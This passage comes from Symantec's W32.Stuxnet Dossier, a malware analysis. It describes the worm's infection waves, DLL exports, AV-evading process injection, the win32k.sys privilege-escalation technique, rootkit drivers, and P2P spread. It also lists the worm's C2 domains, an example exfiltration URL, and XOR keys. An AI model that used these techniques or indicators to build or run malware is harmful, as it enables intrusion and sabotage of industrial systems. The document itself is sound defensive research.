• Domain E appears to have been targeted once (May 2010), but had three initial infections. (I.e., the same
initially infected USB key was inserted into three different computers.)
• 12,000 infections originated from these initial 10 infections.
• 1,800 different domain names were recorded.
• Organizations were targeted in June 2009, July 2009, March 2010, April 2010, and May 2010.
• All targeted organizations have a presence in Iran.
• The shortest span between compile time and initial infection was 12 hours.
• The longest span between compile time and initial infection was 28 days.
• The average span between compile time and initial infection was 19 days.
• The median span between compile time and initial infection was 26 days.
Note any timing information could be incorrect due to time zones or incorrectly set system times.
Page 7
W32.Stuxnet Dossier
Security Response
The following table provides details on the initial targets.

Table 2
Attack Waves Against the Initial Targets

Attack Wave Site Compile Time Infection Time Time to Infect
Attack Wave 1 Domain A June, 22 2009 16:31:47 June 23, 2009 4:40:16 0 days 12 hours
Domain B June, 22 2009 16:31:47 June 28, 2009 23:18:14 6 days 6 hours
Domain C June, 22 2009 16:31:47 July 7, 2009 5:09:28 14 days 12 hours
Domain D June, 22 2009 16:31:47 July 19, 2009 9:27:09 26 days 16 hours
Attack Wave 2 Domain B March, 1 2010 5:52:35 March 23, 2010 6:06:07 22 days 0 hours
Attack Wave 3 Domain A April, 14 2010 10:56:22 April 26, 2010 9:37:36 11 days 22 hours
Domain E April, 14 2010 10:56:22 May 11, 2010 6:36:32 26 days 19 hours
Domain B April, 14 2010 10:56:22 May 13, 2010 5:02:23 28 days 18 hours
This graph shows the time required after compilation to the first infection.
Figure 6
Days Before Infection
The following is a graph that shows the clusters of infections resulting from the 10 different initial infections.
Each infection is a black circle. The red circles represent the variant used. The other colored circles represent the
initial infection with each initial domain having its own color (green, yellow, blue, purple, and orange).
Page 8
W32.Stuxnet Dossier
Security Response
Figure 7
Clusters of Infections Based on Initial Infections
Page 9
W32.Stuxnet Dossier
Security Response
There are a total of 10 clusters representing 10 initial infections. The attack on Domain B in March 2010 spread
the most successfully. Early attacks in June 2009 show the fewest infections; however, these numbers are
skewed because of the low number of June 2009 samples that were recovered.
The following picture shows a zoomed-in view of the lower right of the image. This cluster is the attack on Do-
main E with the initial infection time of 2010/05/11 11:46:10 with the April 2010 variant.
Figure 8
Domain E Attack (detail)
You can see that the graph primarily has linear branches such that a single infection does not infect many com-
puters, but only a single computer. While this is partially due to rate-limiting code within Stuxnet—for example,
a USB infection will delete itself from the USB key after the third infection—a larger influencer may be the
limited number of samples that were recovered. Additional samples would likely yield many more sub-branches.
Stuxnet’s propagation mechanisms are Figure 9
all LAN based and thus, the final target Variant Infection Distribution
must be assumed in close network
proximity to the initial seeded targets.
Nevertheless, with 1,800 different
computer domains out of 12,000
infections, Stuxnet clearly escaped the
original organizations due to collabo-
ration with partner organizations.
Of the approximately 12,000 infec-

tions, the chart in figure 9 shows
which variants resulted in the most
infections.
Page 10
W32.Stuxnet Dossier
Security Response
The March 2010 variant accounts for 69% of all infections. Thus, the March 2010 variant may have been seeded
more successfully. Note the single targeted organization in March 2010 was also targeted in June 2009 and in
April 2010 and neither of those other seeded attempts resulted in as many infections as in March. While smaller
infection rates for the June 2009 variant would be expected since it had less replication methods, the April 2010
variant is almost identical to the March 2010 variant. Thus, either the different seed within the same organiza-
tion resulted in significantly different rates of spread (e.g., seeding in a computer in a department with less
computer-security restrictions) or the data is skewed due to the small percentage of samples recovered.
Page 11
W32.Stuxnet Dossier
Security Response
Stuxnet Architecture
Organization
Stuxnet has a complex architecture that is worth outlining before continuing with our analysis.
The heart of Stuxnet consists of a large .dll file that contains many different exports and resources. In addition to
the large .dll file, Stuxnet also contains two encrypted configuration blocks.
The dropper component of Stuxnet is a wrapper program that contains all of the above components stored inside
itself in a section name “stub”. This stub section is integral to the working of Stuxnet. When the threat is execut-
ed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the
exports.
A pointer to the original stub section is passed to this export as a parameter. This export in turn will extract the
.dll file from the stub section, which was passed as a parameter, map it into memory and call another different
export from inside the mapped .dll file. The pointer to the original stub section is again passed as a parameter.
This occurs continuously throughout the execution of the threat, so the original stub section is continuously
passed around between different processes and functions as a parameter to the main payload. In this way every
layer of the threat always has access to the main .dll and the configuration blocks.
In addition to loading the .dll file into memory and calling an export directly, Stuxnet also uses another technique
to call exports from the main .dll file. This technique is to read an executable template from its own resources,
populate the template with
Table 3
appropriate data, such as
which .dll file to load and DLL Exports
which export to call, and then Export # Function
to inject this newly populated
1 Infect connected removable drives, starts RPC server
executable into another pro-
cess and execute it. The newly 2 Hooks APIs for Step 7 project file infections
populated executable tem- 4 Calls the removal routine (export 18)
plate will load the original .dll 5 Verifies if the threat is installed correctly
file and call whatever export
6 Verifies version information
the template was populated
with. 7 Calls Export 6
9 Updates itself from infected Step 7 projects
Although the threat uses 10 Updates itself from infected Step 7 projects
these two different tech-
14 Step 7 project file infection routine
niques to call exports in the
main .dll file, it should be 15 Initial entry point
clear that all the functionality 16 Main installation
of the threat can be ascer- 17 Replaces Step 7 DLL
tained by analyzing all of the
18 Uninstalls Stuxnet
exports from the main .dll file.
19 Infects removable drives
Exports 22 Network propagation routines

24 Check Internet connection
As mentioned above, the
27 RPC Server
main .dll file contains all of
the code to control the worm. 28 Command and control routine
Each export from this .dll 29 Command and control routine
file has a different purpose 31 Updates itself from infected Step 7 projects
in controlling the threat as
32 Same as 1
outlined in table 3.
Page 12
W32.Stuxnet Dossier
Security Response
Resources
The main .dll file also contains many different resources that the exports above use in the course of controlling
the worm. The resources vary from full .dll files to template executables to configuration files and exploit mod-
ules.
Both the exports and resources are discussed in the sections below.
Table 4
DLL Resources
Resource ID Function
201 MrxNet.sys load driver, signed by Realtek
202 DLL for Step 7 infections
203 CAB file for WinCC infections
205 Data file for Resource 201
207 Autorun version of Stuxnet
208 Step 7 replacement DLL
209 Data file (%windows%\help\winmic.fts)
210 Template PE file used for injection
221 Exploits MS08-067 to spread via SMB.
222 Exploits MS10-061 Print Spooler Vulnerability
231 Internet connection check
240 LNK template file used to build LNK exploit
241 USB Loader DLL ~WTR4141.tmp
242 MRxnet.sys rootkit driver
250 Exploits Windows Win32k.sys Local Privilege Escalation (MS10-073)
Bypassing Behavior Blocking When Loading DLLs

Whenever Stuxnet needs to load a DLL, including itself, it uses a special method designed to bypass behavior-
blocking and host intrusion-protection based technologies that monitor LoadLibrary calls. Stuxnet calls Load-
Library with a specially crafted file name that does not exist on disk and normally causes LoadLibrary to fail.
However, W32.Stuxnet has hooked Ntdll.dll to monitor for requests to load specially crafted file names. These
specially crafted filenames are mapped to another location instead—a location specified by W32.Stuxnet. That
location is generally an area in memory where a .dll file has been decrypted and stored by the threat previously.
The filenames used have the pattern of KERNEL32.DLL.ASLR.[HEXADECIMAL] or SHELL32.DLL.ASLR. [HEXA-
DECIMAL], where the variable [HEXADECIMAL]is a hexadecimal value.
The functions hooked for this purpose in Ntdll.dll are:

• ZwMapViewOfSection
• ZwCreateSection
• ZwOpenFile
• ZwCloseFile
• ZwQueryAttributesFile
• ZwQuerySection
Once a .dll file has been loaded via the method shown above, GetProcAddress is used to find the address of a
specific export from the .dll file and that export is called, handing control to that new .dll file.
Page 13
W32.Stuxnet Dossier
Security Response
Injection Technique
Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the
particular export. Stuxnet can inject into an existing or newly created arbitrary process or a preselected trusted
process. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or
instruct the trusted process to inject the code into another currently running process.
The trusted process consists of a set of default Windows processes and a variety of security products. The cur-
rently running processes are enumerated for the following:
• Kaspersky KAV (avp.exe)
• Mcafee (Mcshield.exe)
• AntiVir (avguard.exe)
• BitDefender (bdagent.exe)
• Etrust (UmxCfg.exe)
• F-Secure (fsdfwd.exe)
• Symantec (rtvscan.exe)
• Symantec Common Client (ccSvcHst.exe)
• Eset NOD32 (ekrn.exe)
• Trend Pc-Cillin (tmpproxy.exe)
In addition, the registry is searched for indicators that the following programs are installed:
• KAV v6 to v9
• McAfee
• Trend PcCillin
If one of the above security product processes are detected, version information of the main image is extracted.
Based on the version number, the target process of injection will be determined or the injection process will fail
if the threat considers the security product non-bypassable.
The potential target processes for the injection are as follows:

• Lsass.exe
• Winlogon.exe
• Svchost.exe
• The installed security product process
Table 5 describes which process is used for injection depending on which security products are installed. In ad-
dition, Stuxnet will determine if it needs to use one of the two currently undisclosed privilege escalation vulner-
abilities before injecting. Then, Stuxnet executes the target process in suspended mode.
A template PE file is extracted from itself and a new Table 5
section called .verif is created. The section is made Process Injection

large enough so that the entry point address of
the target process falls within the .verif section. At Security Product Installed Injection target
that address in the template PE file, Stuxnet places KAV v1 to v7 LSASS.EXE
a jump to the actual desired entry point of the KAV v8 to v9 KAV Process
injected code. These bytes are then written to the McAfee Winlogon.exe
target process and ResumeThread is called allowing
AntiVir Lsass.exe
the process to execute and call the injected code.
BitDefender Lsass.exe
This technique may bypass security products that ETrust v5 to v6 Fails to Inject
employ behavior-blocking. ETrust (Other) Lsass.exe
In addition to creating the new section and patch- F-Secure Lsass.exe

ing the entry point, the .stub section of the wrapper Symantec Lsass.exe
.dll file (that contains the main .dll file and configu- ESET NOD32 Lsass.exe
ration data) is mapped to the memory of the new
Trend PC Cillin Trend Process
process by means of shared sections. So the new
Page 14
W32.Stuxnet Dossier
Security Response
process has access to the original .stub section. When the newly injected process is resumed, the injected code
unpacks the .dll file from the mapped .stub section and calls the desired export.
Instead of executing the export directly, the injected code can also be instructed to inject into another arbitrary
process instead and within that secondary process execute the desired export.
Configuration Data Block

The configuration data block contains all the values used to control how Stuxnet will act on a compromised com-
puter. Example fields in the configuration data can be seen in the Appendix.
When a new version of Stuxnet is created (using the main DLL plus the 90h-byte data block plus the configura-
tion data), the configuration data is updated, and also a computer description block is appended to the block
(encoded with a NOT XOR 0xFF). The computer description block contains information such as computer name,
domain name, OS version, and infected S7P paths. Thus, the configuration data block can grow pretty big, larger
than the initial 744 bytes.
The following is an example of the computer description block :
5.1 - 1/1/0 - 2 - 2010/09/22-15:15:47 127.0.0.1, [COMPUTER NAME] [DOMAIN NAME] [c:\a\1.

zip:\proj.s7p]
The following describes each field:
5.1 - Major OS Version and Minor OS Version

1/1/0 – Flags used by Stuxnet
2 – Flag specifying if the computer is part of a workgroup or domain
2010/09/22-15:15:47 – The time of infection.
127.0.0.1 – Up to IP addresses of the compromised computer (not in the June 2009 version).
[COMPUTER NAME] – The computer name.
[DOMAIN NAME] – The domain or workgroup name.
[c:\a\1.zip:\proj.s7p] – The file name of infected project file.
Page 15
W32.Stuxnet Dossier
Security Response
Installation
Export 15 is the first export called when the .dll file is loaded for the first time. It is responsible for checking that
the threat is running on a compatible version of Windows, checking whether the computer is already infected or
not, elevating the privilege of the current process to system, checking what antivirus products are installed, and
what the best process to inject into is. It then injects the .dll file into the chosen process using a unique injection
technique described in the Injection Technique section and calls export 16.
Figure 10
Control flow for export 15
The first task in export 15 is to check if the configuration data is up-to-date. The configuration data can be
stored in two locations. Stuxnet checks which is most up-to-date and proceeds with that configuration data.
Next, Stuxnet determines if it is running on a 64-bit machine or not; if the machine is 64-bit the threat exits.
At this point it also checks to see what operating system it is running on. Stuxnet will only run on the following
operating systems:
• Win2K
• WinXP
• Windows 2003
• Vista
• Windows Server 2008
• Windows 7
• Windows Server 2008 R2
If it is not running on one of these operating systems it will exit.
Next, Stuxnet checks if it has Administrator rights on the computer. Stuxnet wants to run with the highest privi-
lege possible so that it will have permission to take whatever actions it likes on the computer. If it does not have
Administrator rights, it will execute one of the two zero-day escalation of privilege attacks described below.
Page 16
W32.Stuxnet Dossier
Security Response
If the process already has the rights it requires it proceeds to prepare to call export 16 in the main .dll file. It calls
export 16 by using the injection techniques described in the Injection Technique section.
When the process does not have Adminstrator rights on the system it will try to attain these privileges by using
one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system
of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008
R2 the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating
system is Windows XP or Windows 2000 the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-
073) is exploited.
If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the
csrss.exe process in the case of the win32k.sys vulnerability or as a new task with Adminstrator rights in the
case of the Task Scheduler vulnerability.
The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Task Scheduler vulner-
ability currently are not released as patches are not yet available. The Win32k.sys vulnerability is described in
the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-073) section.
After export 15 completes the required checks, export 16 is called.
Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised com-
puter; decrypts, creates and installs the rootkit files and registry keys; injects itself into the services.exe process
to infect removable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the global
mutexes that are used to communicate between different components; and connects to the RPC server.
Figure 11
Infection routine flow
Export 16 first checks that the configuration data is valid, after that it checks the value “NTVDM TRACE” in the
following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation
Page 17
W32.Stuxnet Dossier
Security Response
If this value is equal to 19790509 the threat will exit. This is thought to be an infection marker or a “do not
infect” marker. If this is set correctly infection will not occur. The value may be a random string and represent
nothing, but also appears to match the format of date markers used in the threat. As a date, the value may be
May 9, 1979. This date could be an arbitrary date, a birth date, or some other significant date. While on May 9,
1979 a variety of historical events occured, according to Wikipedia “Habib Elghanian was executed by a firing
squad in Tehran sending shock waves through the closely knit Iranian Jewish community. He was the first Jew
and one of the first civilians to be executed by the new Islamic government. This prompted the mass exodus of
the once 100,000 member strong Jewish community of Iran which continues to this day.” Symantec cautions
readers on drawing any attribution conclusions. Attackers would have the natural desire to implicate another
party.
Next, Stuxnet reads a date from the configuration data (offset 0x8c in the configuration data). If the current date
is later than the date in the configuration file then infection will also not occur and the threat will exit. The date
found in the current configuration file is June 24, 2012.
Stuxnet communicates between different components via global mutexes. Stuxnet tries to create such a global
mutex but first it will use SetSecurityDescriptorDacl for computers running Windows XP and also the SetSecuri-
tyDescriptorSacl API for computers running Windows Vista or later to reduce the integrity levels of objects, and
thus ensure no write actions are denied.
Next, Stuxnet creates 3 encrypted files. These files are read from the .stub section of Stuxnet; encrypted and
written to disk, the files are:
1. The main Stuxnet payload .dll file is saved as Oem7a.pnf
2. A 90 byte data file copied to %SystemDrive%\inf\mdmeric3.PNF
3. The configuration data for Stuxnet is copied to %SystemDrive%\inf\mdmcpq3.PNF
4. A log file is copied to %SystemDrive%\inf\oem6C.PNF
Then Stuxnet checks the date again to ensure the current date is before June 24, 2012.
Subsequently Stuxnet checks whether it is the latest version or if the version encrypted on disk is newer. It does
this by reading the encrypted version from the disk, decrypting it, and loading it into memory. Once loaded Stux-
net calls export 6 from the newly loaded file; export 6 returns the version number of the newly loaded file from
the configuration data. In this way Stuxnet can read the version number from its own configuration data and
compare it with the version number from the file on disk. If the versions match then Stuxnet continues.
Provided that the version check passed, Stuxnet will extract, decode, and write two files from the resources sec-
tion to disk. The files are read from resource 201 and 242 and are written to disk as “Mrxnet.sys“ and “Mrxcls.
sys” respectively. These are two driver files; one serves as the load point and the other is used to hide malicious
files on the compromised computer and to replace the Stuxnet files on the disk if they are removed. The mechan-
ics of these two files are discussed in the Load Point and Rootkit Functionality sections respectively. When these
files are created the file time on them is changed to match the times of other files in the system directory to
avoid suspicion. Once these files have been dropped Stuxnet creates the registry entries necessary to load these
files as services that will automatically run when Windows starts.
Once Stuxnet has established that the rootkit was installed correctly it creates some more global mutexes to
signal that installation has occurred successfully.
Stuxnet passes control to two other exports to continue the installation and infection routines. Firstly, it injects
the payload .dll file into the services.exe process and calls export 32, which is responsible for infecting newly
connected removable drives and for starting the RPC server. Secondly, Stuxnet injects the payload .dll file into
the Step7 process S7tgtopx.exe and calls export 2. In order to succeed in this action, Stuxnet may need to kill the
explorer.exe and S7tgtopx.exe processes if they are running. Export 2 is used to infect all Step7 project files as
outlined in the Step7 Project File Infection section.
From here execution of Stuxnet continues via these 2 injections and via the driver files and services that were
created.
Page 18
W32.Stuxnet Dossier
Security Response
Stuxnet then waits for a short while before trying to connect to the RPC server that was started by the export
32 code. It will call function 0 to check it can successfully connect and then it makes a request to function 9 to
receive some information, storing this data in a log file called oem6c.pnf.
At this time, all the default spreading and payload routines have been activated.
Windows Win32k.sys Local Privilege Escalation (MS10-073)

Stuxnet exploited a 0-day vulnerability in win32k.sys, used for local privilege escalation. The vulnerability was
patched on October 12, 2010. The vulnerability resides in code that calls a function in a function pointer table;
however, the index into the table is not validated properly allowing code to be called outside of the function
table.
The installation routine in Export 15, extracts and executes Resource 250, which contains a DLL that invokes the
local privilege escalation exploit. The DLL contains a single export—Tml_1. The code first verifies that the execu-
tion environment isn’t a 64-bit system and is Windows XP or Windows 2000.
If the snsm7551.tmp file exists execution ceases, otherwise the file ~DF540C.tmp is created, which provides an
in-work marker.
Next, win32k.sys is loaded into memory and the vulnerable function table pointer is found. Next, Stuxnet will ex-
amine the DWORDs that come after the function table to find a suitable DWORD to overload as a virtual address
that will be called. When passing in an overly large index into the function table, execution will transfer to code
residing at one of the DWORDs after the function table. These DWORDs are just data used elsewhere in win32k.
sys, but hijacked by Stuxnet. For example, if the ASCII string ‘aaaa’ (DWORD 0x60606060) is located after the
function table, Stuxnet will allocate shellcode at address 0x60606060 and then pass in an overly large function
table index that points to the DWORD ‘aaaa’ (0x60606060).
Because the available space at the address (in the above example 0x60606060) may be limited, Stuxnet uses
a two stage shellcode strategy. Memory is allocated for the main shellcode and at the chosen hijacked address,
Stuxnet only places a small piece of shellcode that will jump to the main shellcode.
Next, Stuxnet drops a malformed keyboard layout file into the Temp directory with the file name ~DF<random>.
tmp. The malformed keyboard layout file contains a byte that will result in the overly large index into the func-
tion table. NtUserLoadKeyboardLayoutEx is called to load the malformed keyboard layout file successfully invok-
ing the exploit. The original keyboard layout is restored and then the malformed keyboard layout file is deleted.
The shellcode then loads the main Stuxnet DLL in the context of CSRSS.EXE.
Page 19
W32.Stuxnet Dossier
Security Response
Load Point
Stuxnet drops Resource 242 MrxCls.sys via Export 16. MrxCls is a driver digitally signed with a compromised
Realtek certificate that was revoked on July 16, 2010 by Verisign. A different version of the driver was also found
signed by a different compromised digital certificate from JMicron.
Mrxcls.sys is a driver that allows Stuxnet to be executed every time an infected system boots and thus acts as
the main load-point for the threat. The driver is registered as a boot start service creating the registry key HKEY_
LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls\”ImagePath” = “%System%\drivers\mrxcls.sys”
and thus loading early in the Windows boot process.
The goal of the driver is to inject and execute copies of Stuxnet into specific processes.
The driver contains an encrypted data block. After decryption, this block contains (among others) a registry key/
value pair, which is normally HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxCls\“Data”.
The driver reads this binary value (previously set by Stuxnet during the installation process). The value is de-
crypted. It contains a list of pairs (target process name, module to inject):
• services.exe — %Windir%\inf\oem7A.PNF
• S7tgtopx.exe — %Windir%\inf\oem7A.PNF
• CCProjectMgr.exe — %Windir%\inf\oem7A.PNF
• explorer.exe — %Windir%\inf\oem7m.PNF
The services.exe, s7tgtopx.exe (Simatic manager) and CCProjectMgr.exe (WinCC project manager) will be inject-
ed with oem7a.pnf, which is a copy of the main Stuxnet dll. Once injected, Stuxnet executes on the compromised
computer.
Explorer.exe is injected with oem7m.pnf, an unknown file, which does not appear to be dropped by Stuxnet.
Page 20
W32.Stuxnet Dossier
Security Response
Command and Control

After the threat has installed itself, dropped its files, and gathered some information about the system it con-
tacts the command and control server on port 80 and sends some basic information about the compromised
computer to the attacker via HTTP. Two command and control servers have been used in known samples:
• www[.]mypremierfutbol[.]com
• www[.]todaysfutbol[.]com
The two URLs above previously pointed to servers in Malaysia and Denmark; however they have since been
redirected to prevent the attackers from controlling any compromised computers. The threat has the capability
to update itself with new command and control domains, but we have not seen any files with updated configu-
rations as yet. A configuration file named %Windir%\inf\mdmcpq3.PNF is read and the updated configuration
information from that file is written to the main dll and the checksum of the dll is recalculated to ensure it is still
correct.
System data is gathered by export 28 and consists of the following information in the following format:
Part 1:
0x00 byte 1, fixed value

0x01 byte from Configuration Data (at offset 14h)
0x02 byte OS major version
0x03 byte OS minor version
0x04 byte OS service pack major version
0x05 byte size of part 1 of payload
0x06 byte unused, 0
0x07 byte unused, 0
0x08 dword from C. Data (at offset 10h, Sequence ID)
0x0C word unknown
0x0E word OS suite mask
0x10 byte unused, 0
0x11 byte flags
0x12 string computer name, null-terminated
0xXX string domain name, null-terminated
Part 2, following part 1:
0x00 dword IP address of interface 1, if any

0x0C dword from Configuration Data (at offset 9Ch)
0x10 byte unused, 0
0x11 string copy of S7P string from C. Data (418h)
Note that the payload contains the machine and domain name, as well as OS information. The flags at offset 11h
have the 4th bit set if at least one of the two registry values is found:
• HKEY_LOCAL_MACHINE\Software\Siemens\Step7, value: STEP7_Version
• HKEY_LOCAL_MACHINE\Software\Siemens\WinCC\Setup, value: Version
This informs the attackers if the machine is running the targeted ICS programming software Siemens Step7 or
WinCC.
The payload data is then XOR-ed with the byte value 0xFF.
After the data is gathered, export #29 will then be executed (using the previously mentioned injection technique)
to send the payload to a target server. The target process can be an existing Internet Explorer process (iexplore.
exe), by default or if no iexplore.exe process is found the target browser process will be determined by examining
Page 21
W32.Stuxnet Dossier
Security Response
the registry key HKEY_CLASSES_ROOT\HTTP\SHELL\OPEN\COMMAND. A browser process is then created and

injected to run Export #29.
Export #29 is used to send the above information to one of the malicious Stuxnet servers specified in the Con-
figuration Data block. First, one of the two below legitimate web servers referenced in the Configuration Data
block are queried, to test network connectivity:
• www.windowsupdate.com
• www.msn.com
If the test passes, the network packet is built. It has the following format:
0x00 dword 1, fixed value

0x04 clsid unknown
0x14 byte[6] unknown
0x1A dword IP address of main interface
0x1E byte[size] payload
The payload is then XOR-ed with a static 31-byte long byte string found inside Stuxnet:
0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A,
0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1
The result is « hexified » (in order to transform binary data to an ascii string). For instance, the sequence of bytes
(0x12, 0x34) becomes the string “1234”.
The payload is then sent to one of the two aforementioned URLs, as the “data” parameter. For example:
[http://]www.mypremierfutbol.com/index.php?data=1234...
Using the HTTP protocol as well as pure ASCII parameters is a common way by malware (and legitimate applica-
tions for that matter) to bypass corporate firewall blocking rules.
The malicious Stuxnet server processes the query and may send a response to the client. The response payload
is located in the HTTP Content section. Contrary to the payload sent by the client, it is pure binary data. How-
ever, it is encrypted with the following static 31-byte long XOR key:
0xF1, 0x17, 0xFA, 0x1C, 0xE2, 0x33, 0xC1, 0xD7, 0xBB, 0x77, 0x26, 0xC0, 0xE4, 0x96, 0x15, 0xC4, 0x62, 0x2E,
0x2D, 0x18, 0x95, 0xF0, 0xD8, 0xAD, 0x4B, 0x23, 0xBA, 0xDC, 0x4F, 0xD7, 0x0C
The decrypted server response has the following format:
0x00 dword payload module size (n)

0x04 byte command byte, can be 0 or 1
0x05 byte[n] payload module (Windows executable)
Depending on the command byte, the payload module is either loaded in the current process, or in a separate
process via RPC. Then, the payload module’s export #1 is executed.
This feature gave Stuxnet backdoor functionality, as it had the possibility (before the *futbol* domains were
blocked) to upload and run any code on an infected machine. At the time of writing no additional executables
were detected as being sent by the attackers, but this method likely allowed them to download and execute ad-
ditional tools or deliver updated versions of Stuxnet.
Page 22
W32.Stuxnet Dossier
Security Response
Figure 12
Command and Control
Page 23
W32.Stuxnet Dossier
Security Response
Windows Rootkit Functionality

Stuxnet has the ability to hide copies of its files copied to removable drives. This prevents users from noticing
that their removable drive is infected before sharing the removable drive to another party and also prevents
those users from realizing the recently inserted removable drive was the source of infection.
Stuxnet via Export 16 extracts Resource 201 as MrxNet.sys. The driver is registered as a service creating the fol-
lowing registry entry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\”ImagePath” = “%System%\drivers\
mrxnet.sys”
The driver file is a digitally signed with a legitimate Realtek digital certificate. The certificate was confirmed as
compromised and revoked on July 16, 2010 by Verisign.
The driver scans the following filesystem driver objects:

• \FileSystem\ntfs
• \FileSystem\fastfat
• \FileSystem\cdfs
A new device object is created by Stuxnet and attached to the device chain for each device object managed by
these driver objects. The MrxNet.sys driver will manage this driver object. By inserting such objects, Stuxnet is
able to intercept IRP requests (example: writes, reads, to devices NTFS, FAT or CD-ROM devices).
The driver also registers to a filesystem registration callback routine in order to hook newly created filesystem
objects on the fly.
The driver monitors “directory control” IRPs, in particular “directory query” notifications. Such IRPs are sent to
the device when a user program is browsing a directory, and requests the list of files it contains for instance.
Two types of files will be filtered out from a query directory result:
• Files with a “.LNK” extension having a size of 4,171 bytes.
• Files named “~WTR[FOUR NUMBERS].TMP”, whose size is between 4Kb and 8Mb; the sum of the four numbers
modulo 10 is null. For example, 4+1+3+2=10=0 mod 10
These filters hide the files used by Stuxnet to spread through removable drives, including:
• Copy of Copy of Copy of Copy of Shortcut to.lnk
• Copy of Copy of Copy of Shortcut to.lnk
• Copy of Copy of Shortcut to.lnk
• Copy of Shortcut to.lnk
• ~wtr4132.tmp
• ~wtr4141.tmp
In the driver file, the project path b:\myrtus\src\objfre_w2k_x86\i386 \guava.pdb was not removed.
Guavas are plants in the myrtle (myrtus) family genus. The string could have no significant meaning; however, a
variety of interpretations have been discussed. Myrtus could be “MyRTUs”. RTU stands for remote terminal unit
and are similar to a PLC and, in some environments, used as a synonym for PLCs. In addition, according to Wiki-
pedia, “Esther was originally named Hadassah. Hadassah means ‘myrtle’ in Hebrew.” Esther learned of a plot to
assassinate the king and “told the king of Haman’s plan to massacre all Jews in the Persian Empire...The Jews
went on to kill only their would-be executioners.” Symantec cautions readers on drawing any attribution conclu-
sions. Attackers would have the natural desire to implicate another party.
Page 24
W32.Stuxnet Dossier
Security Response
Stuxnet Propagation Methods

Stuxnet has the ability to propogate using a variety of methods. Stuxnet propagates by infecting removable
drives and also by copying itself over the network using a variety of means, including two exploits. In addition,
Stuxnet propagates by copying itself to Step 7 projects using a technique that causes Stuxnet to auto-execute
when opening the project. The following sections describe the network, removable drive, and Step 7 project
propagation routines.
Network propagation routines

Export 22 is responsible for the majority of the network propagation routines that Stuxnet uses. This export
builds a “Network Action” class that contains 5 subclasses. Each subclass is responsible for a different method
of infecting a remote host.
The functions of the 5 subclasses are:

• Peer-to-peer communication and updates
• Infecting WinCC machines via a hardcoded database server password
• Propagating through network shares
• Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability
• Propagating through the MS08-067 Windows Server Service Vulnerability
Each of these classes is discussed in more detail below.
Peer-to-peer communication
The P2P component works by installing an RPC server and client. When the threat infects a computer it starts
the RPC server and listens for connections. Any other compromised computer on the network can connect to the
RPC server and ask what version of the threat is installed on the remote computer.
If the remote version is newer then the local computer will make a request for the new version and will update
itself with that. If the remote version is older the local computer will prepare a copy of itself and send it to the
remote computer so that it can update itself. In this way an update can be introduced to any compromised com-
puter on a network and it will eventually spread to all other compromised computers.
All of the P2P requests take place over RPC as outlined below.
The RPC server offers the following routines. (Note that RPC methods 7, 8, 9 are not used by Stuxnet.)
• 0: Returns the version Figure 13
number of Stuxnet Example of an old client requesting latest version of Stuxnet via P2P
installed
• 1: Receive an .exe
file and execute it
(through injection)
• 2: Load module and
executed export
• 3: Inject code into
lsass.exe and run it
• 4: Builds the latest
version of Stuxnet and
sends to compromised
computer
• 5: Create process
• 6: Read file
• 7: Drop file
• 8: Delete file
• 9: Write data records
Page 25
W32.Stuxnet Dossier
Security Response
The RPC client makes the following requests:

1. Call RPC function 0 to get remote version number.
2. Check if remote version number is newer than local version number.
3. If remote version number is newer then:
1. Call RPC function 4 to request latest Stuxnet exe
2. Receive the latest version of Stuxnet
3. Install it locally (via process injection)
4. If the remote version number is older then:
1. Prepare a standalone .exe file of the local Stuxnet version.
2. Send the .exe file to the remote computer by calling RPC function 1.
When trying to connect to a remote RPC server this class uses the following logic.
It will attempt to call RPC function 0 on each of the following bindings in turn, if any RPC call succeeds then
Stuxnet proceeds with that binding:
1. ncacn_ip_tcp:IPADDR[135]
2. ncacn_np:IPADDR[\\pipe\\ntsvcs]
3. ncacn_np:IPADDR[\\pipe\\browser]
It will then try to impersonate the anonymous token and try the following binding:
4. ncacn_np:IPADDR[\\pipe\\browser]
It then reverts to its own token and finally tries to enumerate through the service control manager (SCM) looking
for any other bindings that may be available:
5. ncacn_ip_tcp:IPADDR (searches in the SCM for available services)
If any of the above bindings respond correctly to RPC function 0 then Stuxnet has found a remote compromised
computer. RPC function 0 returns the version number of the remote Stuxnet infection. Based on this version
number Stuxnet will either send a copy of itself to the remote computer or it will request a copy of the latest ver-
sion from the remote computer and install it.
RPC function 1 is called in order to receive the latest version from the remote computer and RPC function 4 is
called to send the latest version of Stuxnet to the remote computer.
Of course Stuxnet does not simply execute the received executable. Instead, it injects it into a chosen process
and executes it that way as outlined in the Injection Technique section.
Furthermore, Stuxnet is actually a .dll file so in order to send an executable version of itself to the attacker
Stuxnet must first build an executable version of itself. It does this by reading in a template .exe from resource
210 and populating it with all of the addition detail that is needed to make an executable version of the currently
installed Stuxnet version, including the latest configuration data and information about the currently compro-
mised computer.
Because the peer-to-peer mechanism occurs through RPC, it is unlikely as an alternative method of command
and control as RPC generally is only effective within a local area network (LAN). The purpose of the peer-to-peer
mechanism is likely to allow the attackers to reach computers that do not have outbound access to the general
Internet, but can communicate with other computers on the LAN that have been infected and are able to contact
the command and control servers.
Infecting WinCC computers

This class is responsible for connecting to a remote server running the WinCC database software. When it finds
a system running this software it connects to the database server using a password that is hardcoded within the
